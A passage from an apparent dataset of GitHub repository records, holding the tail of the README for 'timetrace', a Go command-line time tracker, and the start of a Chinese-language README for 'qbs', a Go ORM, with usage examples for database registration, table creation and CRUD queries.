|\n\n**Example:**\n\nEdit a project called `make-coffee`:\n\n```\ntimetrace edit project make-coffee\n```\n\n:fire: **New:** Restore the project to its state prior to the last edit:\n\n```\ntimetrace edit project make-coffee --revert\n```\n\n### Edit a record\n\n**Syntax:**\n\n```\ntimetrace edit record {|latest}\n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ------------------------------------------------------------------------------------------------------------------------------------------- |\n| `KEY` | The project key. `YYYY-MM-DD-HH-MM` by default or `YYYY-MM-DD-HH-MMPM` if [`use12hours` is set](#prefer-12-hour-clock-for-storing-records). |\n\n**Flags:**\n\n| Flag | Short | Description |\n| ---------- | ----- | ----------------------------------------------------------------------------- |\n| `--plus` | `-p` | Add the given duration to the record's end time, e.g. `--plus 1h 10m` |\n| `--minus` | `-m` | Subtract the given duration from the record's end time, e.g. `--minus 1h 10m` |\n| `--revert` | `-r` | Revert the record to its state prior to the last edit. |\n\n**Example:**\n\nEdit the latest record. Specifying no flag will open the record in your editor:\n\n```\ntimetrace edit record latest\n```\n\nAdd 15 minutes to the end of the record created on May 1st, 3PM:\n\n```\ntimetrace edit record 2021-05-01-15-00 --plus 15m\n```\n\n:fire: **New:** Restore the record to its state prior to the last edit:\n\n```\ntimetrace edit record 2021-05-01-15-00 --revert\n```\n\nTip: You can get the record key `2021-05-01-15-00` using [`timetrace list records`](#list-all-records-from-a-date).\n\n### Delete a project\n\n**Syntax:**\n\n```\ntimetrace delete project \n```\n\n**Arguments:**\n\n| Argument | Description |\n| -------- | ---------------- |\n| `KEY` | The project key. |\n\n**Flags:**\n\n| Flag | Short | Description |\n| ------------------- | ----- | --------------------------------------------------------------------------------------------------------------------------------------- |\n| `--revert` | `-r` | Restore a deleted project. |\n| `--exclude-records` | `-e` | Exclude associated project records from the deletion. If used together with `--revert`, excludes restoring project records from backup. |\n\n**Example:**\n\nDelete a project called `make-coffee`. Note that submodules will be deleted along with the parent project:\n\n```\ntimetrace delete project make-coffee\n```\nThe command will prompt for confirmation of whether project records should be deleted too.\n\n:fire: **New:** Restore the project to its pre-deletion state. Submodules will be restored along with the parent project:\n\n```\ntimetrace delete project make-coffee --revert\n```\nThe command will prompt for confirmation of whether project records should be restored from backup too. This is a\npotentially dangerous operation since records edited in the meantime will be overwritten by the backup.\n\n### Delete a record\n\n**Syntax:**\n\n```\ntimetrace delete record \n```\n\n**Arguments:**\n\n| Argument | Description |\n| ------------------ | ------------------------------------- |\n| `YYYY-MM-DD-HH-MM` | The start time of the desired record. |\n\n| Flag | Short | Description |\n| ---------- | ----- | --------------------------- |\n| `--yes` | | Do not ask for confirmation |\n| `--revert` | `-r` | Restore a deleted record. |\n\n**Example:**\n\nDelete a record created on May 1st 2021, 3:00 PM:\n\n```\ntimetrace delete record 2021-05-01-15-00\n```\n\n:fire: **New:** Restore the record to its pre-deletion state:\n\n```\ntimetrace delete record 2021-05-01-15-00 --revert\n```\n\n### Generate a report `[beta]`\n\n**Syntax:**\n\n```\ntimetrace report\n```\n\n**Flags:**\n\n| Flag | Short | Description |\n| ----------------------- | ----- | ------------------------------------------------------------------------------------------------------------------------------------------------------------------ |\n| `--billable` | `-b` | Filter report for only billable records. |\n| `--non-billable` | | Filter report for non-billable records. |\n| `--start ` | `-s` | Filter report from a specific point in time (start is inclusive). |\n| `--end ` | `-e` | Filter report to a specific point in time (end is inclusive). |\n| `--project ` | `-p` | Filter report for only one project. |\n| `--output ` | `-o` | Write report as JSON to file. |\n| `--file path/to/report` | `-f` | Write report to a specific file
(if not given will use config `report-dir`
if config not present writes to `$HOME/.timetrace/reports/report-`). |\n\n### Print version information\n\n**Syntax:**\n\n```\ntimetrace version\n```\n\n**Example:**\n\nPrint your installed timetrace version:\n\n```\ntimetrace version\n```\n\n## Configuration\n\nYou may provide your own configuration in a file called `config.yaml` within\n`$HOME/.timetrace`.\n\n### Prefer 12-hour clock for storing records\n\nIf you prefer to use the 12-hour clock instead of the default 24-hour format,\nadd this to your `config.yaml` file:\n\n```yaml\n# config.yml\nuse12hours: true\n```\n\nThis will allow you to [view a record](#get-a-record) created at 3:00 PM as\nfollows:\n\n```\ntimetrace get record 2021-05-14-03-00PM\n```\n\n### Prefer decimal hours for status and reports\n\nIf your prefer to use decimal hours for durations, e.g. `1.5h` instead of `1h 30m`,\nadd this to your `config.yaml` file:\n\n```yaml\nuseDecimalHours: \"On\"\n```\n\nTo display durations in _both_ formats at the same time, use:\n\n```yaml\nuseDecimalHours: \"Both\"\n```\n\n**Examples with durations in different formats:**\n\n```\ndefault (useDecimalHours = \"Off\")\n+-------------------+----------------------+----------------+----------+\n| CURRENT PROJECT | WORKED SINCE START | WORKED TODAY | BREAKS |\n+-------------------+----------------------+----------------+----------+\n| make-coffee | 1h 8min | 3h 8min | 0h 11min |\n+-------------------+----------------------+----------------+----------+\n\nDecimal Hours (useDecimalHours = \"On\")\n+-------------------+----------------------+----------------+----------+\n| CURRENT PROJECT | WORKED SINCE START | WORKED TODAY | BREAKS |\n+-------------------+----------------------+----------------+----------+\n| make-coffee | 1.2h | 3.2h | 0.2h |\n+-------------------+----------------------+----------------+----------+\n\nBoth (useDecimalHours = \"Both\")\n+-------------------+----------------------+----------------+---------------+\n| CURRENT PROJECT | WORKED SINCE START | WORKED TODAY | BREAKS |\n+-------------------+----------------------+----------------+---------------+\n| make-coffee | 1h 8min 1.2h | 3h 8min 3.2h | 0h 11min 0.2h |\n+-------------------+----------------------+----------------+---------------+\n```\n\n### Set your preferred editor\n\nBy default, timetrace will open the editor specified in `$EDITOR` or fall back\nto `vi`. You may set your provide your preferred editor like so:\n\n```yaml\n# config.yml\neditor: nano\n```\n\n### Configure defaults for projects\n\nTo add a configuration for a specific project, use the `projects` key which accepts\na map with the project key as key and the project configuration as value.\n\nEach project configuration currently has the following schema:\n\n```yaml\nbillable: bool\n```\n\nFor example, always make records for the `make-coffee` project billable:\n\n```yaml\n# config.yml\nprojects:\n make-coffee:\n billable: true\n```\n\n## Credits\n\nThis project depends on the following packages:\n\n- [spf13/cobra](https://github.com/spf13/cobra)\n- [spf13/viper](https://github.com/spf13/viper)\n- [fatih/color](https://github.com/fatih/color)\n- [olekukonko/tablewriter](https://github.com/olekukonko/tablewriter)\n- [enescakir/emoji](https://github.com/enescakir/emoji)\n", "readme_type": "markdown", "hn_comments": "What a haking haking", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "coocood/qbs", "link": "https://github.com/coocood/qbs", "tags": [], "stars": 550, "description": "QBS stands for Query By Struct. A Go ORM.", "lang": "Go", "repo_lang": "", "readme": "Qbs\r\n=====\r\n\r\nQbs\u662f\u4e00\u4e2aGo\u8bed\u8a00\u7684ORM\r\n\r\n## \u7279\u6027\r\n\r\n* \u652f\u6301\u901a\u8fc7struct\u5b9a\u4e49\u8868\u7ed3\u6784\uff0c\u81ea\u52a8\u5efa\u8868\u3002\r\n* \u5982\u679c\u8868\u5df2\u7ecf\u5b58\u5728\uff0c\u800cstruct\u5b9a\u4e49\u4e86\u65b0\u7684\u5b57\u6bb5\uff0cQbs\u4f1a\u81ea\u52a8\u5411\u6570\u636e\u5e93\u8868\u6dfb\u52a0\u76f8\u5e94\u7684\u5b57\u6bb5\u3002\r\n* \u5728\u67e5\u8be2\u65f6\uff0cstruct\u91cc\u7684\u5b57\u6bb5\u4f1a\u6620\u5c04\u5230\"SELECT\"\u8bed\u53e5\u91cc\u3002\r\n* \u901a\u8fc7\u5728struct\u91cc\u6dfb\u52a0\u4e00\u4e2a\u5bf9\u5e94\u7740\u7236\u8868\u7684struct\u6307\u9488\u5b57\u6bb5\u6765\u5b9e\u73b0\u5173\u8054\u67e5\u8be2\u3002\r\n* \u589e\u5220\u6539\u67e5\u90fd\u901a\u8fc7struct\u6765\u5b9e\u73b0\u3002\r\n* \u67e5\u8be2\u540e\uff0c\u9700\u8981\u7684\u6570\u636e\u901a\u8fc7struct\u6765\u53d6\u5f97\u3002\r\n* \u901a\u8fc7Condition\u6765\u7f16\u5199\u67e5\u8be2\u6761\u4ef6\uff0c\u53ef\u4ee5\u8f7b\u677e\u5730\u7ec4\u7ec7\u4e0d\u540c\u4f18\u5148\u7ea7\u7684\u591a\u4e2aAND\u3001OR\u5b50\u6761\u4ef6\u3002\r\n* \u5982\u679cstruct\u91cc\u5305\u542bId\u5b57\u6bb5\uff0c\u800c\u4e14\u503c\u5927\u4e8e\u96f6\uff0c\u8fd9\u4e2a\u5b57\u6bb5\u7684\u503c\u4f1a\u88ab\u89c6\u4e3a\u67e5\u8be2\u6761\u4ef6\uff0c\u6dfb\u52a0\u5230Where\u8bed\u53e5\u91cc\u3002\r\n* \u53ef\u4ee5\u901a\u8fc7\u5b57\u6bb5\u540d\u6216tag\u5b9a\u4e49created\u548cupdated\u5b57\u6bb5\uff0c\u5f53\u63d2\u5165/\u66f4\u65b0\u65f6\uff0c\u4f1a\u81ea\u52a8\u66f4\u65b0\u4e3a\u5f53\u524d\u65f6\u95f4\u3002\r\n* struct\u53ef\u4ee5\u901a\u8fc7\u5b9e\u73b0Validator interface\uff0c\u5728\u63d2\u5165\u6216\u66f4\u65b0\u4e4b\u524d\u5bf9\u6570\u636e\u8fdb\u884c\u9a8c\u8bc1\u3002\r\n* \u76ee\u524d\u652f\u6301MySQL\uff0c PosgreSQL\uff0c SQLite3\uff0c\u5373\u5c06\u652f\u6301Oracle\u3002\r\n* \u652f\u6301\u8fde\u63a5\u6c60\u3002\r\n\r\n## \u5b89\u88c5\r\n\r\n go get github.com/coocood/qbs\r\n\r\n## API\u6587\u6863\r\n\r\n[GoDoc](http://godoc.org/github.com/coocood/qbs)\r\n\r\n## \u6ce8\u610f\r\n\r\n* \u65b0\u7684\u7248\u672c\u53ef\u80fd\u4f1a\u4e0d\u517c\u5bb9\u65e7\u7684API\uff0c\u4f7f\u65e7\u7a0b\u5e8f\u4e0d\u80fd\u6b63\u5e38\u5de5\u4f5c\u3002\r\n* \u4e00\u6b21go get\u4e0b\u8f7d\u540e\uff0c\u8bf7\u4fdd\u7559\u5f53\u65f6\u7684\u7248\u672c\uff0c\u5982\u679c\u9700\u8981\u5176\u5b83\u673a\u5668\u4e0a\u7f16\u8f91\uff0c\u8bf7\u590d\u5236\u5f53\u65f6\u7684\u7248\u672c\uff0c\u4e0d\u8981\u5728\u65b0\u7684\u673a\u5668\u4e0a\u901a\u8fc7go get\u6765\u4e0b\u8f7d\u6700\u65b0\u7248\u672c\u3002\r\n* \u6216\u8005Fork\u4e00\u4e0b\uff0c\u7248\u672c\u7684\u66f4\u65b0\u81ea\u5df1\u6765\u638c\u63e1\u3002\r\n* \u6bcf\u4e00\u6b21\u8fdb\u884c\u6709\u53ef\u80fd\u7834\u574f\u517c\u5bb9\u6027\u7684\u66f4\u65b0\u65f6\uff0c\u4f1a\u628a\u4e4b\u524d\u7684\u7248\u672c\u4fdd\u5b58\u4e3a\u4e00\u4e2a\u65b0\u7684branch, \u540d\u5b57\u662f\u66f4\u65b0\u7684\u65e5\u671f\u3002\r\n\r\n## \u4f7f\u7528\u624b\u518c\r\n\r\n\r\n### \u9996\u5148\u8981\u6ce8\u518c\u6570\u636e\u5e93\uff1a\r\n- \u53c2\u6570\u6bd4\u6253\u5f00\u6570\u636e\u5e93\u8981\u591a\u4e24\u4e2a\uff0c\u5206\u522b\u662f\u6570\u636e\u5e93\u540d:\"qbs_test\"\u548cDialect:`qbs.NewMysql()`\u3002\r\n- \u4e00\u822c\u53ea\u9700\u8981\u5728\u5e94\u7528\u542f\u52a8\u662f\u6267\u884c\u4e00\u6b21\u3002\r\n\r\n func RegisterDb(){\r\n \tqbs.Register(\"mysql\",\"qbs_test@/qbs_test?charset=utf8&parseTime=true&loc=Local\", \"qbs_test\", qbs.NewMysql())\r\n }\r\n\r\n\r\n### \u5b9a\u4e49\u4e00\u4e2a`User`\u7c7b\u578b\uff1a\r\n- \u5982\u679c\u5b57\u6bb5\u5b57\u4e3a`Id`\u800c\u4e14\u7c7b\u578b\u4e3a`int64`\u7684\u8bdd\uff0c\u4f1a\u88abQbs\u89c6\u4e3a\u4e3b\u952e\u3002\u5982\u679c\u60f3\u7528`Id`\u4ee5\u5916\u7684\u540d\u5b57\u505a\u4e3a\u4e3b\u952e\u540d\uff0c\u53ef\u4ee5\u5728\u540e\u52a0\u4e0a`qbs:\"pk\"`\u6765\u5b9a\u4e49\u4e3b\u952e\u3002\r\n- `Name`\u540e\u9762\u7684\u6807\u7b7e`qbs:\"size:32,index\"`\u7528\u6765\u5b9a\u4e49\u5efa\u8868\u65f6\u7684\u5b57\u6bb5\u5c5e\u6027\u3002\u5c5e\u6027\u5728\u53cc\u5f15\u53f7\u4e2d\u5b9a\u4e49\uff0c\u591a\u4e2a\u4e0d\u540c\u7684\u5c5e\u6027\u7528\u9017\u53f7\u533a\u5206\uff0c\u4e2d\u95f4\u6ca1\u6709\u7a7a\u683c\u3002\r\n- \u8fd9\u91cc\u7528\u5230\u4e24\u4e2a\u5c5e\u6027\uff0c\u4e00\u4e2a\u662f`size`\uff0c\u503c\u662f32\uff0c\u5bf9\u5e94\u7684SQL\u8bed\u53e5\u662f`varchar(32)`\u3002\r\n- \u53e6\u4e00\u4e2a\u5c5e\u6027\u662f`index`\uff0c\u5efa\u7acb\u8fd9\u4e2a\u5b57\u6bb5\u7684\u7d22\u5f15\u3002\u4e5f\u53ef\u4ee5\u7528`unique`\u6765\u5b9a\u4e49\u552f\u4e00\u7ea6\u675f\u7d22\u5f15\u3002\r\n- string\u7c7b\u578b\u7684size\u5c5e\u6027\u5f88\u91cd\u8981\uff0c\u5982\u679c\u52a0\u4e0asize\uff0c\u800c\u4e14size\u5728\u6570\u636e\u5e93\u652f\u6301\u7684\u8303\u56f4\u5185\uff0c\u4f1a\u751f\u6210\u5b9a\u957f\u7684varchar\u7c7b\u578b\uff0c\u4e0d\u52a0size\u7684\u8bdd\uff0c\u5bf9\u5e94\u7684\u6570\u636e\u5e93\u7c7b\u578b\u662f\u4e0d\u5b9a\u957f\u7684\uff0c\u6709\u7684\u6570\u636e\u5e93\uff08MySQL)\u65e0\u6cd5\u5efa\u7acb\u7d22\u5f15\u3002\r\n\r\n\r\n type User struct {\r\n Id int64\r\n Name string `qbs:\"size:32,index\"`\r\n }\r\n\r\n- \u5982\u679c\u9700\u8981\u8054\u5408\u7d22\u5f15\uff0c\u9700\u8981\u5b9e\u73b0Indexes\u65b9\u6cd5\u3002\r\n\r\n\r\n func (*User) Indexes(indexes *qbs.Indexes){\r\n //indexes.Add(\"column_a\", \"column_b\") or indexes.AddUnique(\"column_a\", \"column_b\")\r\n }\r\n\r\n\r\n### \u65b0\u5efa\u8868\uff1a\r\n- `qbs.NewMysql`\u51fd\u6570\u521b\u5efa\u6570\u636e\u5e93\u7684Dialect(\u65b9\u8a00)\uff0c\u56e0\u4e3a\u4e0d\u540c\u6570\u636e\u5e93\u7684SQL\u8bed\u53e5\u548c\u6570\u636e\u7c7b\u578b\u6709\u5dee\u5f02\uff0c\u6240\u4ee5\u9700\u8981\u4e0d\u540c\u7684Dialect\u6765\u9002\u914d\u3002\u6bcf\u4e2aQbs\u652f\u6301\u7684\u6570\u636e\u5e93\u90fd\u6709\u76f8\u5e94\u7684Dialect\u51fd\u6570\u3002\r\n- `qbs.NewMigration`\u51fd\u6570\u7528\u6765\u521b\u5efaMigration\u5b9e\u4f8b\uff0c\u7528\u6765\u8fdb\u884c\u5efa\u8868\u64cd\u4f5c\u3002\u548c\u6570\u636e\u5e93\u7684CRUD\u64cd\u4f5c\u7684Qbs\u5b9e\u4f8b\u662f\u5206\u5f00\u7684\u3002\r\n- \u5efa\u8868\u65f6\uff0c\u5373\u4f7f\u8868\u5df2\u5b58\u5728\uff0c\u5982\u679c\u53d1\u73b0\u6709\u65b0\u589e\u7684\u5b57\u6bb5\u6216\u7d22\u5f15\uff0c\u4f1a\u81ea\u52a8\u6267\u884c\u6dfb\u52a0\u5b57\u6bb5\u548c\u7d22\u5f15\u7684\u64cd\u4f5c\u3002\r\n- \u5efa\u8868\u65b9\u6cd5\u5efa\u8bae\u5728\u7a0b\u5e8f\u542f\u52a8\u65f6\u8c03\u7528\uff0c\u800c\u4e14\u5b8c\u5168\u53ef\u4ee5\u7528\u5728\u4ea7\u54c1\u6570\u636e\u5e93\u4e0a\u3002\u56e0\u4e3a\u6240\u6709\u7684\u8fc1\u79fb\u64cd\u4f5c\u90fd\u662f\u589e\u91cf\u7684\uff0c\u975e\u7834\u574f\u6027\u7684\uff0c\u6240\u4ee5\u4e0d\u4f1a\u6709\u6570\u636e\u4e22\u5931\u7684\u98ce\u9669\u3002\r\n- `CreateTableIfNotExists`\u65b9\u6cd5\u7684\u53c2\u6570\u5fc5\u987b\u662fstruct\u6307\u9488\uff0c\u4e0d\u7136\u4f1apanic\u3002\r\n\r\n\r\n func CreateUserTable() error{\r\n migration, err := qbs.GetMigration()\r\n if err != nil {\r\n return err\r\n }\r\n defer migration.Close()\r\n return migration.CreateTableIfNotExists(new(User))\r\n }\r\n\r\n\r\n### \u83b7\u53d6\u548c\u4f7f\u7528`*qbs.Qbs`\u5b9e\u4f8b\uff1a\r\n- \u5047\u8bbe\u9700\u8981\u5728\u4e00\u4e2ahttp\u8bf7\u6c42\u4e2d\u83b7\u53d6\u548c\u4f7f\u7528Qbs.\r\n- \u53d6\u5f97Qbs\u5b9e\u4f8b\u540e\uff0c\u5e94\u8be5\u9a6c\u4e0a\u6267\u884c`defer q.Close()`\u6765\u56de\u6536\u6570\u636e\u5e93\u8fde\u63a5\u3002\r\n- qbs\u4f7f\u7528\u8fde\u63a5\u6c60\uff0c\u9ed8\u8ba4\u5927\u5c0f\u4e3a100\uff0c\u53ef\u4ee5\u901a\u8fc7\u5728\u5e94\u7528\u542f\u52a8\u65f6\uff0c\u8c03\u7528`qbs.ChangePoolSize()`\u6765\u4fee\u6539\u3002\r\n\r\n func GetUser(w http.ResponseWriter, r *http.Request){\r\n \tq, err := qbs.GetQbs()\r\n \tif err != nil {\r\n \t\tfmt.Println(err)\r\n \t\tw.WriteHeader(500)\r\n \t\treturn\r\n \t}\r\n \tdefer q.Close()\r\n \tu, err := FindUserById(q, 6)\r\n \tdata, _ := json.Marshal(u)\r\n \tw.Write(data)\r\n }\r\n\r\n### \u63d2\u5165\u6570\u636e\uff1a\r\n- \u5982\u679c\u5904\u7406\u4e00\u4e2a\u8bf7\u6c42\u9700\u8981\u591a\u6b21\u8fdb\u884c\u6570\u636e\u5e93\u64cd\u4f5c\uff0c\u6700\u597d\u5728\u51fd\u6570\u95f4\u4f20\u9012*Qbs\u53c2\u6570\uff0c\u8fd9\u6837\u53ea\u9700\u8981\u6267\u884c\u4e00\u6b21\u83b7\u53d6\u5173\u95ed\u64cd\u4f5c\u5c31\u53ef\u4ee5\u4e86\u3002\r\n- \u63d2\u5165\u6570\u636e\u65f6\u4f7f\u7528`Save`\u65b9\u6cd5\uff0c\u5982\u679c`user`\u7684\u4e3b\u952eId\u6ca1\u6709\u8d4b\u503c\uff0c`Save`\u4f1a\u6267\u884cINSERT\u8bed\u53e5\u3002\r\n- \u5982\u679c`user`\u7684`Id`\u662f\u4e00\u4e2a\u6b63\u6574\u6570\uff0c`Save`\u4f1a\u9996\u5148\u6267\u884c\u4e00\u6b21SELECT COUNT\u64cd\u4f5c\uff0c\u5982\u679c\u53d1\u73b0count\u4e3a0\uff0c\u4f1a\u6267\u884cINSERT\u8bed\u53e5\uff0c\u5426\u5219\u4f1a\u6267\u884cUPDATE\u8bed\u53e5\u3002\r\n- `Save`\u7684\u53c2\u6570\u5fc5\u987b\u662fstruct\u6307\u9488\uff0c\u4e0d\u7136\u4f1apanic\u3002\r\n\r\n\r\n func CreateUser(q *qbs.Qbs) (*User,error){\r\n user := new(User)\r\n user.Name = \"Green\"\r\n _, err := q.Save(user)\r\n return user,err\r\n }\r\n\r\n### \u67e5\u8be2\u6570\u636e\uff1a\r\n- \u5982\u679c\u9700\u8981\u6839\u636eId\u4e3b\u952e\u67e5\u8be2\uff0c\u53ea\u8981\u7ed9user\u7684Id\u8d4b\u503c\u5c31\u53ef\u4ee5\u4e86\u3002\r\n\r\n\r\n func FindUserById(q *qbs.Qbs, id int64) (*User, error) {\r\n user := new(User)\r\n user.Id = id\r\n err := q.Find(user)\r\n return user, err\r\n }\r\n\r\n\r\n- \u67e5\u8be2\u591a\u884c\u9700\u8981\u8c03\u7528`FindAll`\uff0c\u53c2\u6570\u5fc5\u987b\u662fslice\u7684\u6307\u9488\uff0cslice\u7684\u5143\u7d20\u5fc5\u987b\u662fstruct\u7684\u6307\u9488\u3002\r\n\r\n\r\n func FindUsers(q *qbs.Qbs) ([]*User, error) {\r\n \tvar users []*User\r\n \terr := q.Limit(10).Offset(10).FindAll(&users)\r\n \treturn users, err\r\n }\r\n\r\n\r\n- \u5176\u5b83\u7684\u67e5\u8be2\u6761\u4ef6\uff0c\u9700\u8981\u8c03\u7528`Where`\u65b9\u6cd5\u3002\u8fd9\u91cc\u7684`WhereEqual(\"name\", name)`\u76f8\u5f53\u4e8e`Where\uff08\"name = ?\", name)`\uff0c\u53ea\u662f\u4e00\u4e2a\u7b80\u5199\u5f62\u5f0f\u3002\r\n- `Where`/`WhereEqual`\u53ea\u6709\u6700\u540e\u4e00\u6b21\u8c03\u7528\u6709\u6548\uff0c\u4e4b\u524d\u8c03\u7528\u7684\u6761\u4ef6\u4f1a\u88ab\u540e\u9762\u7684\u8986\u76d6\u6389\uff0c\u9002\u7528\u4e8e\u7b80\u5355\u7684\u67e5\u8be2\u6761\u4ef6\uff0c\u3002\r\n- \u6ce8\u610f\uff0c\u8fd9\u91cc\u7b2c\u4e00\u4e2a\u53c2\u6570\u5b57\u6bb5\u540d\u662f`\"name\"`\uff0c\u800c\u4e0d\u662fstruct\u91cc\u7684`\"Name\"`\u3002\u6240\u6709\u4ee3\u7801\u91cc\u7684`AbCd`\u5f62\u5f0f\u7684\u5b57\u6bb5\u540d\uff0c\u6216\u7c7b\u578b\u540d\uff0c\u5728\u50a8\u5b58\u5230\u6570\u636e\u5e93\u65f6\u4f1a\u88ab\u8f6c\u5316\u4e3a`ab_cd`\u7684\u5f62\u5f0f\u3002\r\n\u8fd9\u6837\u505a\u7684\u76ee\u7684\u662f\u4e3a\u4e86\u7b26\u5408go\u7684\u547d\u540d\u89c4\u8303\uff0c\u65b9\u4fbfjson\u5e8f\u5217\u5316\uff0c\u540c\u65f6\u907f\u514d\u5927\u5c0f\u5199\u9020\u6210\u7684\u6570\u636e\u5e93\u8fc1\u79fb\u9519\u8bef\u3002\r\n\r\n\r\n func FindUserByName(q *qbs.Qbs, n string) (*User, error) {\r\n user := new(User)\r\n err := q.WhereEqual(\"name\", n).Find(user)\r\n return user, err\r\n }\r\n\r\n\r\n- \u5982\u679c\u9700\u8981\u5b9a\u4e49\u590d\u6742\u7684\u67e5\u8be2\u6761\u4ef6\uff0c\u53ef\u4ee5\u8c03\u7528`Condition`\u65b9\u6cd5\u3002\u53c2\u6570\u7c7b\u578b\u4e3a`*Condition`\uff0c\u901a\u8fc7`NewCondition`\u6216`NewEqualCondition`\u3001`NewInCondition`\u51fd\u6570\u6765\u65b0\u5efa\u3002\r\n- `*Condition`\u7c7b\u578b\u652f\u6301`And`\u3001`Or`\u7b49\u65b9\u6cd5\uff0c\u53ef\u4ee5\u8fde\u7eed\u8c03\u7528\u3002\r\n- `Condition`\u65b9\u6cd5\u540c\u6837\u4e5f\u53ea\u80fd\u8c03\u7528\u4e00\u6b21\uff0c\u800c\u4e14\u4e0d\u53ef\u4ee5\u548c`Where`\u540c\u65f6\u4f7f\u7528\u3002\r\n\r\n\r\n func FindUserByCondition(q *qbs.Qbs) (*User, error) {\r\n user := new(User)\r\n condition1 := qbs.NewCondition(\"id > ?\", 100).Or(\"id < ?\", 50).OrEqual(\"id\", 75)\r\n condition2 := qbs.NewCondition(\"name != ?\", \"Red\").And(\"name != ?\", \"Black\")\r\n condition1.AndCondition(condition2)\r\n err := q.Condition(condition1).Find(user)\r\n return user, err\r\n }\r\n\r\n\r\n### \u66f4\u65b0\u4e00\u884c\uff1a\r\n- \u66f4\u65b0\u4e00\u884c\u6570\u636e\u9700\u8981\u5148`Find`\uff0c\u518d`Save`\u3002\r\n\r\n\r\n func UpdateOneUser(q *qbs.Qbs, id int64, name string) (affected int64, error){\r\n \tuser, err := FindUserById(q, id)\r\n \tif err != nil {\r\n \t\treturn 0, err\r\n \t}\r\n \tuser.Name = name\r\n \treturn q.Save(user)\r\n }\r\n\r\n\r\n### \u66f4\u65b0\u591a\u884c\uff1a\r\n- \u591a\u884c\u7684\u66f4\u65b0\u9700\u8981\u8c03\u7528`Update`\uff0c\u9700\u8981\u6ce8\u610f\u7684\u662f\uff0c\u5982\u679c\u4f7f\u7528\u5305\u542b\u6240\u6709\u5b57\u6bb5\u7684struct\uff0c\u4f1a\u628a\u6240\u6709\u7684\u5b57\u6bb5\u90fd\u66f4\u65b0\uff0c\u8fd9\u4e0d\u4f1a\u662f\u60f3\u8981\u7684\u7ed3\u679c\u3002\r\n\u89e3\u51b3\u529e\u6cd5\u662f\u5728\u51fd\u6570\u91cc\u5b9a\u4e49\u4e34\u65f6\u7684struct\uff0c\u53ea\u5305\u542b\u9700\u8981\u66f4\u65b0\u7684\u5b57\u6bb5\u3002\u5982\u679c\u5728\u51fd\u6570\u91cc\u9700\u8981\u7528\u5230\u540c\u540d\u7684struct\uff0c\u53ef\u4ee5\u628a\u51b2\u7a81\u7684\u90e8\u5206\u653e\u5728block\u91cc`{...}`\u3002\r\n\r\n\r\n func UpdateMultipleUsers(q *qbs.Qbs)(affected int64, error) {\r\n \ttype User struct {\r\n \t\tName string\r\n \t}\r\n \tuser := new(User)\r\n \tuser.Name = \"Blue\"\r\n \treturn q.WhereEqual(\"name\", \"Green\").Update(user)\r\n }\r\n\r\n### \u5220\u9664\uff1a\r\n- \u5220\u9664\u65f6\u6761\u4ef6\u4e0d\u53ef\u4ee5\u4e3a\u7a7a\uff0c\u8981\u4e48\u5728Id\u5b57\u6bb5\u5b9a\u4e49\uff0c\u8981\u4e48\u5728Where\u6216Condition\u91cc\u5b9a\u4e49\u3002\r\n\r\n\r\n func DeleteUser(q *qbs.Qbs, id int64)(affected int64, err error) {\r\n \tuser := new(User)\r\n \tuser.Id = id\r\n \treturn q.Delete(user)\r\n }\r\n\r\n### \u5b9a\u4e49\u9700\u8981\u5173\u8054\u67e5\u8be2\u7684\u8868\uff1a\r\n- \u8fd9\u91cc`Post`\u91cc\u5305\u542b\u4e86\u4e00\u4e2a\u540d\u4e3a`AuthorId`\uff0c\u7c7b\u578b\u4e3a`int64`\u7684\u5b57\u6bb5\uff0c\u800c\u4e14\u540c\u65f6\u5305\u542b\u4e00\u4e2a\u540d\u4e3a`Author`\uff0c\u7c7b\u578b\u4e3a`*User`\u7684\u5b57\u6bb5\u3002\r\n- \u4f7f\u7528\u7c7b\u4f3c `{xxx}Id int64`, `{xxx} *{yyy}` \u8fd9\u6837\u7684\u683c\u5f0f\uff0c\u5c31\u53ef\u4ee5\u5b9a\u4e49\u5173\u8054\u67e5\u8be2\u3002\r\n- \u8fd9\u91cc`Author`\u8fd9\u4e2a\u5b57\u6bb5\u56e0\u4e3a\u662f\u6307\u9488\u7c7b\u578b\uff0c\u6240\u4ee5\u5728`Post`\u5efa\u8868\u65f6\u4e0d\u4f1a\u88ab\u6dfb\u52a0\u4e3acolumn\u3002\r\n- \u5efa\u8868\u65f6\uff0c\u56e0\u4e3a\u68c0\u6d4b\u5230\u5173\u8054\u5b57\u6bb5\uff0c\u6240\u4ee5\u4f1a\u81ea\u52a8\u4e3a`author_id`\u5efa\u7acb\u7d22\u5f15\u3002\u5173\u8054\u5b57\u6bb5\u4e0d\u9700\u8981\u5728tag\u91cc\u5b9a\u4e49\u7d22\u5f15\u3002\r\n- \u5173\u8054\u5b57\u6bb5\u540d\u53ef\u4ee5\u4e0d\u7b26\u5408\u4ee5\u4e0a\u683c\u5f0f\uff0c\u53ea\u8981\u660e\u786e\u5730\u5728`AuthorId`\u7684tag\u91cc\u52a0\u4e0a`qbs:\"join:Author\"`\uff0c\u540c\u6837\u53ef\u4ee5\u5b9a\u4e49\u5173\u8054\u67e5\u8be2\u3002\r\n- \u5b9a\u4e49\u5916\u952e\u7ea6\u675f\u9700\u8981\u660e\u786e\u5730\u5728`AuthorId`\u5bf9\u5e94\u7684tag\u91cc\u6dfb\u52a0`qbs:\"fk:Author\"`\u3002\r\n- \u5b9a\u4e49\u5916\u952e\u7684\u540c\u65f6\uff0c\u4e5f\u5c31\u76f8\u5f53\u4e8e\u5b9a\u4e49\u4e86\u5173\u8054\u67e5\u8be2\uff0c\u540c\u6837\u4f1a\u81ea\u52a8\u5efa\u7acb\u7d22\u5f15\uff0c\u533a\u522b\u4ec5\u4ec5\u662f\u5efa\u8868\u65f6\u6dfb\u52a0\u4e86\u5916\u952e\u7ea6\u675f\u7684\u8bed\u53e5\u3002\r\n- `Created time.Time`\u5b57\u6bb5\u4f1a\u5728\u63d2\u5165\u65f6\u5199\u5165\u5f53\u524d\u65f6\u95f4\uff0c`Updated time.Time`\u5b57\u6bb5\u4f1a\u5728\u66f4\u65b0\u65f6\u81ea\u52a8\u66f4\u65b0\u4e3a\u5f53\u524d\u65f6\u95f4\u3002\r\n- 